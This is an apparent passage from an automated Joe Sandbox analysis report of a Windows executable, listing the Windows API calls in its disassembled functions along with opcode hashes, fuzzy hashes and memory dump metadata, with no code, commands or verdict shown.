                                                          • Opcode Fuzzy Hash: 83b9280dd7b981317dcf6c8cdf86f60725ba43898fdc681f2a57f767f5476d8d
                                                          • Instruction Fuzzy Hash: F1113C31D0091DE7CF019FA5E949AFEBB78FF09711F014165EB41B6240CB709955CB99
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 003F1B19
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 3964851224-769500911
                                                          • Opcode ID: 677c8bc39d3ca355e8179a1b29c87666138e6943e41dee3a09c5fb5c78a80727
                                                          • Instruction ID: afab5f48c67be01a2866c03ae1eb1435e6423810a7e440f2596a684436aea883
                                                          • Opcode Fuzzy Hash: 677c8bc39d3ca355e8179a1b29c87666138e6943e41dee3a09c5fb5c78a80727
                                                          • Instruction Fuzzy Hash: D011A13091010CDFCF05EF64D8619FEB3B4FF25308B1084A9D914AB692EB325D06CB44
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040EC07
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0040EC37
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0040ED6A
                                                          • CloseHandle.KERNEL32(?), ref: 0040EDEB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 647e8fe18a424c88b8e69b7d66f0028b758722212f17c0309da55863d32dc4b2
                                                          • Instruction ID: ac039631f077aa71af19bc7c0de4cf0e3ffd54d327a1dbbcc038146699d329b9
                                                          • Opcode Fuzzy Hash: 647e8fe18a424c88b8e69b7d66f0028b758722212f17c0309da55863d32dc4b2
                                                          • Instruction Fuzzy Hash: 788160716043019FDB21EF29C846F2AB7E5AF89710F04882EF999DB3D2D674AC41CB95
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                          • String ID:
                                                          • API String ID: 1559183368-0
                                                          • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction ID: e0356df55083788a712694b407fcc5dc6e5309558bdc3251d3aed7e2244b66af
                                                          • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                          • Instruction Fuzzy Hash: CE51EB30A00B05DBCB369F69D8407EE77A6EF41329F14872AF93696AD0D770DD508B40
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004100FD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0041013C
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00410183
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 004101AF
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004101BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                          • String ID:
                                                          • API String ID: 3440857362-0
                                                          • Opcode ID: ba8af5ad4a5d95a628353baf7a1f53751639fe27ee6085d54dd6a15ebd2fa22d
                                                          • Instruction ID: 609970a2e515f8bd14b3b1b7b1b61e8b6e0c9dce3e23bbdf78022c60fcf4d31b
                                                          • Opcode Fuzzy Hash: ba8af5ad4a5d95a628353baf7a1f53751639fe27ee6085d54dd6a15ebd2fa22d
                                                          • Instruction Fuzzy Hash: 8C518F31208204AFDB15EF68C881FABB7E8FF88314F00492EF5558B291DB75E985CB56
                                                          APIs
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040D927
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040D9AA
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040D9C6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040DA07
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040DA21
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
                                                            • Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 71bb849a1487cb2f261a8ed2e8c63008d6c7981777b8f02dcbd5614a00ffa4e0
                                                          • Instruction ID: afef91658e33a11faa725eaa24ff50fd68b562f9d1ae89d8d17e250d128b61fe
                                                          • Opcode Fuzzy Hash: 71bb849a1487cb2f261a8ed2e8c63008d6c7981777b8f02dcbd5614a00ffa4e0
                                                          • Instruction Fuzzy Hash: 29512975A00209DFCB01EFA8C4859AEB7F4FF09320B04816AE859AB352D735AD4ACF55
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003FE61F
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003FE648
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003FE687
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003FE6AC
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003FE6B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: 10147e3077b52acb2d8b0fdc700ca19eea485b1a5980276928c523aec9010d89
                                                          • Instruction ID: 03139f5d71d5ac44ca9d1cf1afb14c06c791d6d861bb34f0f39141f22d75d66c
                                                          • Opcode Fuzzy Hash: 10147e3077b52acb2d8b0fdc700ca19eea485b1a5980276928c523aec9010d89
                                                          • Instruction Fuzzy Hash: 5E510A35A00119DFCF06EF68C981AAEBBF5EF09314B1480A9E909AF361DB31ED11DB50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c972010ea06f4f43e4c986213250fee2865a9cc950e951f472a10b142b54839e
                                                          • Instruction ID: de66e4849801c9084e086c4f668c54b1b71113b315099423abca6de9416b1f54
                                                          • Opcode Fuzzy Hash: c972010ea06f4f43e4c986213250fee2865a9cc950e951f472a10b142b54839e
                                                          • Instruction Fuzzy Hash: 4241F735906214BFC711DF24CC48FEABBA4EB09320F144166FC15A73E1C734ADA6DA5A
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00392357
                                                          • ScreenToClient.USER32(004557B0,?), ref: 00392374
                                                          • GetAsyncKeyState.USER32(00000001), ref: 00392399
                                                          • GetAsyncKeyState.USER32(00000002), ref: 003923A7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 7960842d7fa2b47a0fb58e23f6be93e7b54fa4aa688a4520785f53557a3fa13f
                                                          • Instruction ID: 5c3abe9cdc801669376b6f074426c7effa3951e1f429f5fe799560a90a1b4bf8
                                                          • Opcode Fuzzy Hash: 7960842d7fa2b47a0fb58e23f6be93e7b54fa4aa688a4520785f53557a3fa13f
                                                          • Instruction Fuzzy Hash: 50418F39604515FBCF168F69C884FEABB74FB05364F21432AF828962A0C734AD94DB90
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E63E7
                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 003E6433
                                                          • TranslateMessage.USER32(?), ref: 003E645C
                                                          • DispatchMessageW.USER32(?), ref: 003E6466
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003E6475
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                          • String ID:
                                                          • API String ID: 2108273632-0
                                                          • Opcode ID: 5acea202da420264d092b26799b5f8bc1daae82a6315c43ed22d7ae95e50a0c2
                                                          • Instruction ID: dc1bc8c64e0460a973dc247f1824da2360f3165cc654ce93974846d6eb8de3f4
                                                          • Opcode Fuzzy Hash: 5acea202da420264d092b26799b5f8bc1daae82a6315c43ed22d7ae95e50a0c2
                                                          • Instruction Fuzzy Hash: D331F4316007A6AFDB22DFB28C46BF67BACAB20381F154275E421C21E2E734D449CF60
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 003E8A30
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 003E8ADA
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003E8AE2
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 003E8AF0
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003E8AF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: 6f77456fb6093839cc3c045628aa9dbbdadcd80748845558cf3974fe8d024836
                                                          • Instruction ID: 60a0d772900d094694e2610eb567b40d3c12163775a78d5d236de591becce61f
                                                          • Opcode Fuzzy Hash: 6f77456fb6093839cc3c045628aa9dbbdadcd80748845558cf3974fe8d024836
                                                          • Instruction Fuzzy Hash: 9F31BC71900269EFDF14CFA9D94CADE3BB5FB04315F10822AF929EA2D0C7B09915DB90
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 003EB204
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003EB221
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003EB259
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003EB27F
                                                          • _wcsstr.LIBCMT ref: 003EB289
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
                                                          • API String ID: 3902887630-0
                                                          • Opcode ID: f9612654c0f42c3fbb1ea481f7059d022330ab48ecf304ef10e5f29382c92b33
                                                          • Instruction ID: 0c37da844f0d236c0eeaf5802d789e5e2c9a38ffaf5aee1362c191f3aeed85be
                                                          • Opcode Fuzzy Hash: f9612654c0f42c3fbb1ea481f7059d022330ab48ecf304ef10e5f29382c92b33
                                                          • Instruction Fuzzy Hash: E6210731604250BBEB179B769C49EBFBB9CDF49760F018239FA04DE1A1EF61DC419260
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0041B192
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0041B1B7
                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0041B1CF
                                                          • GetSystemMetrics.USER32(00000004), ref: 0041B1F8
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00400E90,00000000), ref: 0041B216
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$MetricsSystem
                                                          • String ID:
                                                          • API String ID: 2294984445-0
                                                          • Opcode ID: ed80fb97977c880065717a0b072b809c20c686b69ae3d3745fde571799c3f540
                                                          • Instruction ID: 7f300c0487b45368e361b8e7e8446e3532b5fe175ea88223c1100f4c57baf7f3
                                                          • Opcode Fuzzy Hash: ed80fb97977c880065717a0b072b809c20c686b69ae3d3745fde571799c3f540
                                                          • Instruction Fuzzy Hash: 7F218271A10651AFCB109F389C18AAA37A5EB05361F114736BD22D72E1D73498658B98
                                                          APIs
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E9320
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E9352
                                                          • __itow.LIBCMT ref: 003E936A
                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E9392
                                                          • __itow.LIBCMT ref: 003E93A3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow$_memmove
                                                          • String ID:
                                                          • API String ID: 2983881199-0
                                                          • Opcode ID: f214912ff2f5952a80f005e3a8ad0f7577d095b4fc280cea18bc6bbe95d5b316
                                                          • Instruction ID: 50fcf68e48e0ff026f02514dc3c4958ef998f06724abb27a72b44818cb2d9f2a
                                                          • Opcode Fuzzy Hash: f214912ff2f5952a80f005e3a8ad0f7577d095b4fc280cea18bc6bbe95d5b316
                                                          • Instruction Fuzzy Hash: B3212935700258BBDB22AB669C85FEE7BACEB48710F054126FD04DB1C1D6B0CD468791
                                                          APIs
                                                          • IsWindow.USER32(00000000), ref: 00405A6E
                                                          • GetForegroundWindow.USER32 ref: 00405A85
                                                          • GetDC.USER32(00000000), ref: 00405AC1
                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00405ACD
                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00405B08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$ForegroundPixelRelease
                                                          • String ID:
                                                          • API String ID: 4156661090-0
                                                          • Opcode ID: fa090aa1849fd3a83e9f6b173ca796e461036c31a9a05a914c6cd2e9e647dead
                                                          • Instruction ID: 820fa35c6f2c28d22a1664e957555125215f4a5ef90f6e5790cd73606a448b37
                                                          • Opcode Fuzzy Hash: fa090aa1849fd3a83e9f6b173ca796e461036c31a9a05a914c6cd2e9e647dead
                                                          • Instruction Fuzzy Hash: 3021A135A00204AFDB04EFA9DC84AAABBE5EF48310F14C079F80997362CA74AC05CB94
                                                          APIs
                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0039134D
                                                          • SelectObject.GDI32(?,00000000), ref: 0039135C
                                                          • BeginPath.GDI32(?), ref: 00391373
                                                          • SelectObject.GDI32(?,00000000), ref: 0039139C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$BeginCreatePath
                                                          • String ID:
                                                          • API String ID: 3225163088-0
                                                          • Opcode ID: 1e2dcfce831d1f0af04b019fa87412f1382e0f34bdb8efb6f96a5642fcf5b566
                                                          • Instruction ID: db097f962cbc258d2c4cc78e09776415d2e776d9d63c583c6aaa0d5208ea879c
                                                          • Opcode Fuzzy Hash: 1e2dcfce831d1f0af04b019fa87412f1382e0f34bdb8efb6f96a5642fcf5b566
                                                          • Instruction Fuzzy Hash: CF215E30800709EBDF12AF26DD447A97BB8EB10322F148236F811A65B2D371D9A5DF98
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 003F4ABA
                                                          • __beginthreadex.LIBCMT ref: 003F4AD8
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 003F4AED
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003F4B03
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003F4B0A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                          • String ID:
                                                          • API String ID: 3824534824-0
                                                          • Opcode ID: d3fb12dc44dbede6cea79fcc40d91bae9b74ee258a40edb8563f47a4ca066ffc
                                                          • Instruction ID: 1d9754127e89589019a22c15f739b87f0ead09d82b05c0c21be0de7930e10082
                                                          • Opcode Fuzzy Hash: d3fb12dc44dbede6cea79fcc40d91bae9b74ee258a40edb8563f47a4ca066ffc
                                                          • Instruction Fuzzy Hash: 87110876904718BBD7028FA89C04AEB7FACEB45321F144275F914D3251D671CD048BA4
                                                          APIs
                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E821E
                                                          • GetLastError.KERNEL32(?,003E7CE2,?,?,?), ref: 003E8228
                                                          • GetProcessHeap.KERNEL32(00000008,?,?,003E7CE2,?,?,?), ref: 003E8237
                                                          • HeapAlloc.KERNEL32(00000000,?,003E7CE2,?,?,?), ref: 003E823E
                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E8255
